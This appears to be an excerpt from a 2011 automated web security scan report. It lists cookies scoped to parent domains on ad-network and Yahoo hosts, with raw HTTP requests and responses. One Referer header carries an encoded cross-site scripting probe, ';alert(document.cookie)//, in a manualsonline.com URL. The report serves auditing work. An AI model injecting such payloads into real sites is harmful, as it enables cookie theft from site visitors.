ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; BMX_G=method->-1,ts->1296999600; BMX_3PC=1
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Sun, 06 Feb 2011 13:40:00 GMT Connection: close Set-Cookie: UID=1d29d89e-72.246.30.75-1294456810; expires=Tue, 05-Feb-2013 13:40:00 GMT; path=/; domain=.voicefive.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /al.asp?ts=20110206132315&adid=401622%2C401622%2C401622&cc=us&di=29166142%2C28321520%2C28321702&hk=1&ipid=12630&mh=167defd4b82c3759d8e6179eb5de4354&pid=2%2C2%2C2&pvm=b60133d74d36fa666d2419a757f62f74&pvu=F09FDD7F3F444C1FA642829D016326B5&rcc=us&so=0&syid=0%2C0%2C0&uf=0%2C0%2C0&ur=0%2C0%2C0&kp=328%2C930%3B336%2C984%3B245%2C1284%3B&prf=ll%3A1385%7Cintl%3A1992%7Cpreprochrome%3A6%7Cgetconchrome%3A27%7Cadvint%3A2035%7Cadvl%3A2035%7Ctl%3A2151&jscallback=$iTXT.js.callback1 HTTP/1.1 Host: baselinemag.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 13:22:40 GMT; Path=/ Content-Type: text/javascript Content-Length: 38 Date: Sun, 06 Feb 2011 13:22:40 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /intellitxt/front.asp?ipid=12630 HTTP/1.1 Host: baselinemag.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gQAAAEt99ts1wA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wUAAAEt+yJbEgA-; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 13:21:28 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wUAAAEt+yJbEgA-; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 13:21:28 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sun, 06 Feb 2011 13:21:27 GMT Content-Length: 10685
document.itxtDisabled=1; document.itxtDebugOn=false; if(document.itxtDisabled){ document.itxtInProg=1; if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: blogs.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: bookmarks.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 05 Feb 2011 22:46:09 GMT Set-Cookie: B=09agn1l6krkph&b=3&s=ud; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Location: https://login.yahoo.com/config/login?.src=bmk2&.intl=us&.done=http%3A%2F%2Fbookmarks.yahoo.com%2F Set-Cookie: BM=s=LDVsdFYCatO4ydCGoEx.tvU_iJRm7U79Rm8ZBWzQWig9Jua.4WPHLMYOfETs9WsebSGQKwKvJhaD2Ss827uiYbPTNOu8IEabjNdTarxICXCpI.pIctl0_oBjRh.gfwu_g5Hd0M4JdVsM2h0OBeqR&u=ki2BuH0CatOne_jM4iqfgUJ6xVkQN9m96VK.qXug1XT2CnidwyTN_4VV3w--; path=/; domain=.bookmarks.yahoo.com Cache-Control: private Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 270
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /BurstingPipe/BannerRedirect.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eyeblaster=BWVal=2657&BWDate=40580.359340&debuglevel=&FLV=10.1103&RES=128&WMPV=0; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ8mb20000000001t48i440000000001t28bwx0000000001t482790000000002t5852G0000000003sS8qav0000000001t57dNH0000000002sZ84ZE0000000001t67GHq0000000001s.7FCH0000000001s.84ZF0000000002t683xP0000000001sF8cVQ0000000001sV82980000000001t3852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001gL2MadKj0bdR00001gYRSaeKR09sO00001gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001fUFGa50V02WG00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001gHrHaeKS09sO00001cRreabeg03Dk00001heXiaeru0c9M00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001; u2=1f5940fe-c0d1-459f-8c91-e4475c881fca3Gz010; C4=; ActivityInfo=000p81bCx%5f; u3=1;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Set-Cookie: eyeblaster=BWVal=2657&BWDate=40580.359340&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Sat, 07-May-2011 11:00:06 GMT; domain=bs.serving-sys.com; path=/ Set-Cookie: u2=1f5940fe-c0d1-459f-8c91-e4475c881fca3Gz01g; expires=Sat, 07-May-2011 11:00:06 GMT; domain=.serving-sys.com; path=/ P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 06 Feb 2011 16:00:06 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /BurstingPipe/BannerSource.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eyeblaster=BWVal=2657&BWDate=40580.359340&debuglevel=&FLV=10.1103&RES=128&WMPV=0; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ8mb20000000001t48i440000000001t28bwx0000000001t482790000000002t5852G0000000003sS8qav0000000001t57dNH0000000002sZ84ZE0000000001t67GHq0000000001s.7FCH0000000001s.84ZF0000000002t683xP0000000001sF8cVQ0000000001sV82980000000001t3852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001gL2MadKj0bdR00001gYRSaeKR09sO00001gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001fUFGa50V02WG00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001gHrHaeKS09sO00001cRreabeg03Dk00001heXiaeru0c9M00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001; u2=1f5940fe-c0d1-459f-8c91-e4475c881fca3Gz010; C4=; ActivityInfo=000p81bCx%5f; u3=1;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Set-Cookie: eyeblaster=BWVal=2657&BWDate=40580.359340&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Sat, 07-May-2011 11:00:06 GMT; domain=bs.serving-sys.com; path=/ Set-Cookie: u2=1f5940fe-c0d1-459f-8c91-e4475c881fca3Gz01g; expires=Sat, 07-May-2011 11:00:06 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C_=BlankImage P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 06 Feb 2011 16:00:06 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2117121&PluID=0&e=0&w=728&h=90&ord=7582024&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3aa6/3/0/%2a/m%3B235470018%3B0-0%3B0%3B23542470%3B3454-728/90%3B40150909/40168696/1%3Bu%3Dzdtopic%3Ditmanagement|zdtopic%3Denterprise|zdtopic%3Dintelligence|zdid%3Da6280|zdtype%3Darticle|zdaudience%3D|zdproduct%3D|zdcompany%3D|zdpagetype%3D%3B%7Eaopt%3D2/0/73/0%3B%7Esscs%3D%3f$$ HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gYyfadw90cvM00001gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001gL2MadKj0bdR00001gKXMaepH0bdR00001h802ae7k0c6L00001fUFGa50V02WG00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001cRreabeg03Dk00001heXiaeru0c9M00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ8mb20000000001t48i440000000001t28bwx0000000001t482790000000002t5852G0000000003sS8qav0000000001t57dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV82980000000001t3852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: buzz.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:46:13 GMT Set-Cookie: B=5u8ndkd6krkpl&b=3&s=t6; expires=Tue, 05-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Cache-Control: private Content-Length: 124261
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html lang="en-US" id="front" class="univHeader pageLang-en-US ie ie7 ie70 winvista"> <head> <title>What's Buzzing? You Tell Us! Top News and ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: buzzport.gatech.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
adsud=BLU0YPM; expires=Fri, 06 May 2011 22:25:47 GMT; path=/; domain=.adsummos.net;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /a/e/d1.ads?r=55898391&bk_stamp=1&s=2jh81Z&et=6&sid=s21719 HTTP/1.1 Host: c03.adsummos.net Proxy-Connection: keep-alive Referer: http://c03.adsummos.net/a/e/s21719 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adsuu=vmkju57YZhpA
Response
HTTP/1.1 302 Moved Temporarily Server: Apache Content-Length: 153 Content-Type: text/html Location: http://user.lucidmedia.com/clicksense/user/browser?p=d4f5efa344d0146a&i=8eca9d9961eb3197d2c29b6bafa25157&r=0&d= Set-Cookie: adsud=BLU0YPM; expires=Fri, 06 May 2011 22:25:47 GMT; path=/; domain=.adsummos.net; Set-Cookie: adsud9=; expires=Fri, 06 May 2011 22:25:47 GMT; path=/; domain=.adsummos.net; ETag: "238f6d58764549fcc9077580bf048dc0:1296534099" P3P: CP="NOI DSP COR NID CUR ADM DEV TAI PSAo PSDo OUR STP UNI COM NAV STA" Cache-Control: max-age=86400 Date: Sat, 05 Feb 2011 22:25:47 GMT Connection: close Vary: Accept-Encoding
<HTML> <HEAD> <TITLE>Error Page</TITLE> </HEAD> <BODY> An error (302 Moved Temporarily) has occured in response to this request. </BODY> </HTML>
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
adsuu=vmkju57YZhpA; expires=Thu, 04 Aug 2011 21:53:21 GMT; path=/; domain=.adsummos.net;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /a/e/s21719 HTTP/1.1 Host: c03.adsummos.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Set-Cookie: adsuu=vmkju57YZhpA; expires=Thu, 04 Aug 2011 21:53:21 GMT; path=/; domain=.adsummos.net; ETag: "b14d7b7fc278107ef643939a58fa5979:1296529756" P3P: CP="NOI DSP COR NID CUR ADM DEV TAI PSAo PSDo OUR STP UNI COM NAV STA" P3P: CP="NOI DSP COR NID CUR ADM DEV TAI PSAo PSDo OUR STP UNI COM NAV STA" P3P: CP="NOI DSP COR NID CUR ADM DEV TAI PSAo PSDo OUR STP UNI COM NAV STA" Vary: Accept-Encoding Cache-Control: max-age=86400 Date: Sat, 05 Feb 2011 21:53:21 GMT Connection: close Content-Length: 8049
// <script type="text/javascript"><!-- var ADSUR, ADSUD, adsuTid, handleExeResponse, adsuAdTag, adsuGetSignal;/*
*/ var h=true,n=null,o=false; (function(){function q(a, ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /i/0R8lWflQ0f_326769041.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZya1ZmSmN4QQ&ciu=MFI4bFdmbFEwZg&reqid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkM&ccw=SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjB8SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjA&epid=&bp=4400&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fwww.orthougm.com%2F&refurl= HTTP/1.1 Host: cdn.w55c.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0813152173226346&output=html&h=60&slotname=3865030659&w=468&lmt=1296964160&flash=10.1.103&hl=en&url=http%3A%2F%2Fwww.orthougm.com%2F&dt=1296942560320&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=8833934355%2C8094259765&correlator=1296942560294&frm=0&adk=2257162608&ga_vid=429166960.1296942499&ga_sid=1296942499&ga_hid=1263121855&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&ref=http%3A%2F%2Fwww.orthougm.com%2Fnslookup.html&fu=0&ifi=3&dtd=3&xpc=dnlnsmkeRR&p=http%3A//www.orthougm.com Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /229/go/253329229/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://technet.microsoft.com/en-us/windows/dd641427.aspx?ITPID=allmdia P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296946032-3966638; expires=Monday, 04-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=531E084363024CB3AD7955FF0ECDEFD5; expires=Wednesday, 24-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=f222/39a8; expires=Monday, 04-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=aafc23c/39a8/f197f4d/f222/4d4dd370; expires=Monday, 04-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sat, 05 Feb 2011 22:47:12 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /MRT/go/258547606/direct/01/ HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.microsoft.com/windows/enterprise/business-needs-overview.aspx?OCID=1WOD_paid&WT.srch=1 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001297008221-9205649; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=AD078C8713444B159EBF588D5E9AEA57; expires=Thursday, 25-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=12eae/39a8; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=ad483ed/39a8/f691f96/12eae/4d4ec65d; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 06 Feb 2011 16:03:40 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /MRT/go/264255445/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://crm.dynamics.com/online?tabid=easy-to-use P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001297008076-9187794; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=F8B2EA3DB6EE4E618E0DC34A30CB08FD; expires=Thursday, 25-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=903d/33f2; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=b0e4d02/33f2/fc037d5/903d/4d4ec5cc; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 06 Feb 2011 16:01:16 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /MRT/go/267859374/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.microsoft.com/en-us/cloud/default.aspx P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001297008076-9187674; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=8F39596F077049028597DA9B186C7374; expires=Thursday, 25-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=129ed/39a8; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=b32673d/39a8/ff735ae/129ed/4d4ec5cc; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 06 Feb 2011 16:01:16 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /go/264255445/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://crm.dynamics.com/online?tabid=easy-to-use P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001297008076-9187974; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=CD1476F5A3284B4D8A84956285B32A92; expires=Thursday, 25-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=903d/33f2; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=b0e4d02/33f2/fc037d5/903d/4d4ec5cc; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 06 Feb 2011 16:01:16 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /go/267859374/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
